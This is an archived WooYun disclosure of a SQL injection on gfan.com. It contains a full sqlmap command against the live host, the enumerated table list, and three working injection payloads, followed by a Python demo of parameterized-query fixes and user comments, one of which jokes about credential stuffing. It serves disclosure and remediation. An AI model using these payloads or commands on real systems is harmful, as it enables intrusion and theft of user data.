Defect ID: WooYun-2014-089323
Vulnerability title: 机锋网 (gfan.com) has a high-risk SQL injection vulnerability, still possibly leading to a leak of 20 million users' data
Vendor: 机锋网
Author: 黑暗游侠
Submitted: 2014-12-30 12:53
Published: 2015-02-13 12:54
Vulnerability type: SQL injection
Severity: High
Self-assessed rank: 20
Status: Confirmed by vendor
Tags:
2014-12-30: Details sent to the vendor, awaiting vendor handling
2014-12-30: Vendor confirmed; details disclosed to the vendor only
2015-01-09: Details disclosed to core white hats and relevant domain experts
2015-01-19: Details disclosed to ordinary white hats
2015-01-29: Details disclosed to intern white hats
2015-02-13: Details disclosed to the public
机锋网 has a high-risk SQL injection vulnerability, still a leak of 20 million users' data
sqlmap, taking one database at random as an example:
sqlmap -u "http://romgame.gfan.com/index.php/gtphone?areacode=*" --dbms=MySQL --risk=3 --level=5 --count -D hd --threads=10

Database: hd
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| rom_act_log          | 50973   |
| rom_act_log_norepet  | 16045   |
| autumn_taste_log     | 1747    |
| autumn_draw_log      | 1161    |
| rom_cellphone        | 193     |
| autumn_draw_count    | 162     |
| rom_apply_info       | 110     |
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
    Payload: http://romgame.gfan.com:80/index.php/gtphone?areacode=-3398 OR (SELECT 3113 FROM(SELECT COUNT(*),CONCAT(0x7178736571,(SELECT (CASE WHEN (3113=3113) THEN 1 ELSE 0 END)),0x71626f7471,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (random number) - 3 columns
    Payload: http://romgame.gfan.com:80/index.php/gtphone?areacode=-8998 UNION ALL SELECT 8335,8335,CONCAT(0x7178736571,0x6a765965564d414e516e,0x71626f7471)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: http://romgame.gfan.com:80/index.php/gtphone?areacode=-2114 OR 3908=SLEEP(5)
---
[12:46:20] [INFO] testing MySQL
[12:46:21] [WARNING] automatically patching output having last char trimmed
[12:46:21] [INFO] confirming MySQL
[12:46:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
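All three injection points sqlmap lists above sit in the numeric `areacode` parameter with no quoting around the injected value, which is the signature of a query that pastes the request parameter straight into its SQL text. The following is an added example, not code from this report or from 机锋网, that reproduces that defect class against a constructed in-memory SQLite table and shows the two fixes a defender applies: binding the value as a query parameter, and validating its shape before any SQL is built. The table layout, the sample rows, the function names and the digit-only format for `areacode` are assumptions made for the example.

```python
import re
import sqlite3

# Constructed sample rows standing in for a table like the `rom_cellphone`
# table in the sqlmap listing above; the columns and values are assumptions.
SAMPLE_ROWS = [
    (1, 10, "constructed-model-A"),
    (2, 21, "constructed-model-B"),
    (3, 755, "constructed-model-C"),
]


def build_db():
    """In-memory SQLite stand-in for the MySQL backend (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE rom_cellphone (id INTEGER, areacode INTEGER, model TEXT)"
    )
    conn.executemany("INSERT INTO rom_cellphone VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, areacode):
    """The defect class in the report: the request parameter is interpolated
    into the SQL text, so an OR condition inside it widens the WHERE clause."""
    sql = "SELECT id, areacode, model FROM rom_cellphone WHERE areacode = %s" % areacode
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, areacode):
    """Fix 1: bind the value instead of concatenating it. The driver passes the
    value as data, so an injected 'OR ...' is just a string that matches nothing."""
    sql = "SELECT id, areacode, model FROM rom_cellphone WHERE areacode = ?"
    return conn.execute(sql, (areacode,)).fetchall()


# Assumed input contract for this example: an area code is 1 to 5 digits.
AREACODE_RE = re.compile(r"\d{1,5}")


def lookup_hardened(conn, areacode):
    """Fix 2 (defence in depth): validate the shape of the input first, then bind
    it with its proper type. Anything that is not a short digit string is rejected
    before a query is built, which also keeps the DB error path unreachable."""
    if not isinstance(areacode, str) or not AREACODE_RE.fullmatch(areacode):
        raise ValueError("areacode must be 1-5 digits")
    sql = "SELECT id, areacode, model FROM rom_cellphone WHERE areacode = ?"
    return conn.execute(sql, (int(areacode),)).fetchall()


if __name__ == "__main__":
    conn = build_db()
    # Input in the same shape as the OR-based payloads in the sqlmap output:
    # a negative number followed by an always-true OR condition (constructed).
    injected = "-3398 OR 1=1"
    print("vulnerable, normal input :", lookup_vulnerable(conn, "21"))
    print("vulnerable, injected     :", lookup_vulnerable(conn, injected))
    print("parameterized, injected  :", lookup_parameterized(conn, injected))
    print("hardened, normal input   :", lookup_hardened(conn, "21"))
    try:
        lookup_hardened(conn, injected)
    except ValueError as exc:
        print("hardened, injected       : rejected:", exc)
```

Running the script shows the vulnerable lookup returning every row for the injected value, the parameterized lookup returning nothing for it, and the hardened lookup refusing it before touching the database. Error-based and time-based variants like the ones sqlmap found need the same underlying concatenation, so binding the parameter closes all three at once; the input validation is what prevents the database error messages from ever being triggered by request data.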
Severity: Medium
Vulnerability rank: 10
Confirmed: 2014-12-30 12:54
Being fixed, thanks for the submission...
None
One second..
The vendor is badass
Credential stuffing is possible... go stuff 12306, haha.
"Still"... I laughed when I saw "still"
@疯狗 I haven't read much, it's one minute, right?